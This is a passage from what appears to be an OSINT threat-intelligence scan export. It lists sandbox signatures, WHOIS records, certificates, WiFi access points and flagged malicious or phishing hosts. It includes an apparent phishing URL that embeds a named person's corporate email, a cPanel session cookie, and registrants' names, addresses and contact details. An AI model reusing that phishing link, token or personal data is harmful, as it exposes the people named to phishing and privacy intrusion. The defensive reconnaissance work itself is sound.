""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Extension Scripts\\000003.log]- [targetUID: 00000000-00007548]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00007548]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_1401701815\\manifest.fingerprint]- [targetUID: 00000000-00007548]\n "wallet-crypto.html" has type "HTML document ASCII text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\wallet-crypto.html]- [targetUID: 00000000-00007548]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006060]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007548]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00006060]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\json\\i18n-ec\\ar\\strings.json]- [targetUID: 00000000-00007548]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00007548]\n "app-setup.js" has type "ASCII text with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\Wallet-Checkout\\app-setup.js]- [targetUID: 00000000-00007548]\n "f_00023d" has type "gzip compressed data max compression original size modulo 2^32 56403"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.4352.0\\shopping.js]- [targetUID: 00000000-00007548]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00007548]\n "9c57454c-e006-46e9-bb3d-a640f37c0f5f.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\9c57454c-e006-46e9-bb3d-a640f37c0f5f.tmp]- [targetUID: 00000000-00006060]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Heuristic match: "\\\\Ahttps://.*?\\\\.sharepoint\\\\.com/.*?/SignOut\\\\.aspx"\n Heuristic match: "\\\\Ahttps://.*?\\\\.vssps\\\\.visualstudio\\\\.com/_signout,"\n Heuristic match: "\\\\Ahttps://.*?tafe\\\\..*?trs.*?\\\\.outlook\\\\.com/TorusSts"\n Heuristic match: "\\\\Ahttps://.*?tafe\\\\..*?trs.*?\\\\.outlook\\\\.com/TorusSts,"\n Heuristic match: "\\\\Ahttps://accounts\\\\.google\\\\.com/Logout,"\n Heuristic match: "\\\\Ahttps://accounts\\\\.google\\\\.com/ServiceLogin/signinchooser"\n Heuristic match: "\\\\Ahttps://login\\\\.microsoftonline\\\\.com/common/oauth2/logout,"\n Heuristic match: "\\\\Ahttps://login\\\\.microsoftonline\\\\.com/common/oauth2/v2\\\\.0/logout,"\n Heuristic match: "\\\\Ahttps://outlook\\\\.live\\\\.com/owa/logoff\\\\.owa,"\n Heuristic match: "\\\\Ahttps://www\\\\.office\\\\.com/estslogout,"\n Heuristic match: "\\\\Ahttps://www\\\\.office\\\\.com/login,"\n Pattern match: "www.gap.com"\n Pattern match: "www.gapfactory.com"\n Pattern match: "https://easylist.to/"\n Pattern match: "https://github.com/easylist"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "http://www.w3.org/2000/svg"\n Heuristic match: "api.salesflare.com"\n Pattern match: "https://creativecommons.org/"\n Pattern match: "https://llink.to"\n Pattern match: "https://rabetsanatkoosha.com/SNS/site.php"\n Pattern match: "https://creativecommons.org/compatiblelicenses"\n Heuristic match: "rabetsanatkoosha.com"\n Heuristic match: "track.salesflare.com"\n Heuristic match: "{ default_config: { name: Default, options: { should_apply_reloads: false, remove_after_match: false, remove_all_query_parameters: false }, domains: [], path_regex: [] }, site_configs: [ { name"\n Pattern match: "https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/09/1/static/css/main.723f5859.css,static_js_url:https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/09/1/static/js/main.476faa97.js,static_version:50},edge_reward"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: "www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applied_policy:block,domain:mozilla.github.io},{applied_policy:block,domain:html5test.com},{applied_policy:block,domain:necromanthus.com},{app"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoin | 185.199.109.153 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Content_Type": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Pragma": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Content_Type": ["text/html; charset=\"utf-8\""], "Set_Cookie": ["cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "cpsession=%3a1TMQH6MZEuqlLsFz%2c7387de1c8dd6f13e5f0cbf314c13b1f5; HttpOnly; path=/; port=2082", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2082", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Pragma": ["no-cache"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | China | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in the Name.com, Inc. WHOIS database is provided by Name.com, Inc. for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Name.com, Inc. does not guarantee its accuracy. Users accessing the Name.com, Inc. WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Name.com, Inc., except as reasonably necessary to register domain names or modify existing registrations. When using the Name.com, Inc. WHOIS service, please consider the following: the WHOIS service is not a replacement for standard EPP commands to the SRS service. WHOIS is not considered authoritative for registered domain objects. The WHOIS service may be scheduled for downtime during production or OT&E maintenance periods. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis, for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.name.com/layered-access-request . Name.com, Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 02:46:24 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [104.196.30.220] | 104.196.30.220 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | CA-IL (Net ID: 00:00:C5:FA:44:D4) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:85:9E:97:C1) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GWS (Net ID: 00:06:25:A0:D7:AA) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:18 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Cloudflare, Inc. is an American company that provides content delivery network services, cloud cybersecurity, DDoS mitigation, and ICANN-accredited domain registration services. Cloudflare's headquarters are located in San Francisco, California. According to The Hill, it is used by more than 20 percent of the entire Internet for its web security services as of 2022. | skip.ns.cloudflare.com |
| 2023-05-12 02:54:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:7a:cf:72:75:e0:23:b5:24:56:0b:ff:81:dc:
d9:ef:b9:84:a5:cb:15:5a:f2:4d:f6:46:6d:b0:47:
aa:99:c5:97:75:9e:1e:5a:4f:3a:12:c1:33:26:f0:
0f:b9:47:15:ee:28:b3:c5:a0:0e:6e:82:c2:e4:9e:
2f:89:8d:b1:98:56:ae:4e:51:dc:76:c6:4d:f7:a0:
da:11:9a:d1:d4:0e:53:d9:8e:4c:35:dc:f0:9d:a8:
b5:1d:3f:0a:c6:d4:12:00:be:6b:8b:db:1c:eb:ff:
fa:8a:0d:30:cf:48:30:73:35:bc:e5:39:78:d6:97:
a1:00:9f:88:3e:2a:d4:35:22:13:80:4e:57:e4:0b:
6b:33:da:ae:7f:1b:ed:8f:82:10:4f:76:18:82:03:
22:e6:2a:88:53:b9:9a:80:d1:10:21:d7:25:be:5d:
9e:dd:23:0e:2f:8b:44:b5:d9:a6:ea:9a:ef:d4:ac:
24:ea:27:de:5f:35:74:c4:ee:db:95:49:53:28:21:
da:c7:71:d0:ef:75:13:d9:75:8b:84:42:b8:62:af:
7a:1c:85:43:b6:85:1f:19:fe:11:de:22:13:41:a7:
26:69:56:b7:56:8c:31:f6:46:81:6d:dd:94:ae:81:
bb:82:f2:fb:15:03:15:a0:92:6d:46:ee:3b:be:82:
d4:cc:f6:b8:f0:82:0e:be:9c:1b:d5:a9:e7:74:12:
18:51:f1:a4:d7:96:be:07:63:2a:5b:b2:de:3e:8d:
99:72:fa:17:ce:36:64:cf:aa:ef:2b:4c:60:46:d0:
cb:1a:9e:bb:94:71:19:32:32:aa:a0:4f:7c:b5:80:
d2:ac:29:a1:3e:79:7a:46:f9:fc:2c:b9:f9:8b:cb:
59:c4:7c:ae:87:57:d8:e5:12:0a:0b:a5:34:e8:72:
2f:e5:15:84:33:1d:01:b8:f5:d1:2b:ff:10:f9:e7:
ef:0c:be:61:fe:87:b7:d8:4f:dc:f0:08:3e:e4:ba:
53:2e:94:64:aa:29:45:65:cb:b5:3b:5d:cd:a7:33:
69:f9:c8:07:c0:c9:87:da:c3:82:4b:50:90:d2:80:
18:a8:e3:89:70:e0:61:b8:c9:4f:82:66:2b:0e:23:
36:49:33:34:63:e7:8a:70:61:f2:a3:6d:68:5c:13:
84:18:1d:5c:05:3c:2b:f0:28:3d:ae:ff:ba:af:c4:
48:bb:d7:f2:a8:15:4b:68:f4:b5:9d:7c:d4:31:43:
bf:01:12:bc:59:5f:ef:ce:fb:0e:78:b7:62:51:52:
0f:d1:8e:d7:11:fa:d7:0c:57:e7:ee:bd:a5:16:b1:
30:a1:96:90:5b:b4:a4:e1:b1:72:88:e0:56:6f:9c:
5b:43:b9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a0:b0:46:e1:61:f3:0f:d5:bd:4b:02:c1:d6:75:b9:f8:08:3f:
64:70:3e:0a:8e:05:b2:6a:d5:2d:f4:c2:44:2e:a1:69:fc:5f:
a9:1c:d9:a6:04:60:12:75:b1:76:52:fb:f1:ff:75:9e:04:19:
67:aa:4f:00:aa:4d:57:a4:a3:68:1c:aa:cb:35:1d:41:8c:dc:
11:dd:f7:90:a2:ae:7c:e8:50:6f:3b:c0:1b:42:7c:1c:15:9c:
91:57:04:35:95:16:bb:4c:ff:22:e0:0c:44:a1:11:6c:76:07:
39:1f:59:4c:5d:c4:6b:b6:12:26:1e:1d:32:67:40:25:44:dc:
e3:1a:dc:31:b4:f1:92:10:ce:d6:3c:cd:02:c8:22:d7:81:50:
ea:ac:04:3b:1f:4b:51:ae:33:f4:24:8b:7f:2e:d9:ff:38:ef:
db:4c:3c:9b:ec:f5:3c:20:af:9a:a6:6e:49:52:0d:57:8a:fe:
12:8f:6b:6e:14:14:d7:22:a3:1b:92:9c:e8:00:cd:fb:2f:a9:
04:b2:c9:5f:ce:7b:7e:43:9a:5c:9d:bc:db:c0:27:6e:61:a2:
00:b8:76:ec:1b:e2:30:04:0a:2e:39:6e:d4:82:d8:1e:28:94:
6b:51:10:7b:2b:3f:22:2b:a5:a4:34:1d:1e:d0:b6:84:c0:7c:
de:7e:13:7e
| battleb0t.xyz |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-th.github.io]
https://www.openphish.com/feed.txt | 0-th.github.io |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.42): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.93): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Internet Archive Account (Category: misc)
https://archive.org/details/@login | login |
| 2023-05-12 02:46:00 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 37.751, -97.822 | 172.67.168.252 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000magda0000.github.io | 185.199.111.153 |
| 2023-05-12 03:12:12 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the
expiration date of the domain name registrant's agreement with the
sponsoring registrar. Users may consult the sponsoring registrar's
Whois database to view the registrar's reported date of expiration
for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign's ("VeriSign") Whois
database is provided by VeriSign for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. VeriSign does not guarantee its accuracy.
By submitting a Whois query, you agree to abide by the following terms of
use: You agree that you may use this Data only for lawful purposes and that
under no circumstances will you use this Data to: (1) allow, enable, or
otherwise support the transmission of mass unsolicited, commercial
advertising or solicitations via e-mail, telephone, or facsimile; or
(2) enable high volume, automated, electronic processes that apply to
VeriSign (or its computer systems). The compilation, repackaging,
dissemination or other use of this Data is expressly prohibited without
the prior written consent of VeriSign. You agree not to use electronic
processes that are automated and high-volume to access or query the
Whois database except as reasonably necessary to register domain names
or modify existing registrations. VeriSign reserves the right to restrict
your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://www.porkbun.com
Updated Date: 2022-01-28 17:32:18
Created Date: 2021-09-13 01:07:39
Registrar Registration Expiration Date: 2024-09-13 01:07:39
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: +1.5038508351
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Domain Status: clientDeleteProhibited http://icann.org/epp#clientDeleteProhibited
Registry Registrant ID:
Registrant Name: d3f c0n6
Registrant Organization: Boat Rolling Inc
Registrant Street: 10 Voie de l'Excelsior
Registrant City: Val-de-Reuil
Registrant State/Province: Normandy
Registrant Postal Code: 27100
Registrant Country: FR
Registrant Phone: +33:FR.268605683
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: d3fc0n6@protonmail.com
Registry Admin ID:
Admin Name: d3f c0n6
Admin Organization: Boat Rolling Inc
Admin Street: 10 Voie de l'Excelsior
Admin City: Val-de-Reuil
Admin State/Province: Normandy
Admin Postal Code: 27100
Admin Country: FR
Admin Phone: +33:FR.268605683
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: d3fc0n6@protonmail.com
Registry Tech ID:
Tech Name: d3f c0n6
Tech Organization: Boat Rolling Inc
Tech Street: 10 Voie de l'Excelsior
Tech City: Val-de-Reuil
Tech State/Province: Normandy
Tech Postal Code: 27100
Tech Country: FR
Tech Phone: +33:FR.268605683
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: d3fc0n6@protonmail.com
Name Server: curitiba.ns.porkbun.com
Name Server: fortaleza.ns.porkbun.com
Name Server: salvador.ns.porkbun.com
Name Server: maceio.ns.porkbun.com
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net
>>> Last update of WHOIS database: 2022-01-28 17:32:18 <<<
For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
The Data in the Porkbun LLC WHOIS database is provided by Porkbun LLC for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Porkbun LLC does not guarantee its accuracy. By submitting a WHOIS query, you agree that you will use this Data only for lawful purposes and that, under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail (spam); or (2) enable high volume, automated, electronic processes that apply to Porkbun LLC (or its systems). Porkbun LLC reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Porkbun!
| rathook.cc |
| 2023-05-12 03:16:21 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | London, England, ENG, United Kingdom, GB | 2a06:98c1:3120::1 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomAE9EF4 (Net ID: 00:0C:F6:AE:9E:F4) | 50.8897, 6.0563 |
| 2023-05-12 03:19:24 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.154:80 | 185.199.109.0/24 |
| 2023-05-12 02:47:42 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 35.229.48.116:443 | 35.229.48.116 |
| 2023-05-12 02:52:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://c.timestamp/1e3),a.data.set(ce,c.qa)));a.get(je)&&(c=a.get(se),d', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://testng.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb0_IESQMMUTEX_0_303"\n "IsoScope_bb0_IESQMMUTEX_0_331"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_bb0_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2992"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bb0_IE_EarlyTabStart_0xc28_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_bb0_ConnHashTable<2992>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb0_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb0_IESQMMUTEX_0_331"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:80"\n "185.199.108.153:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 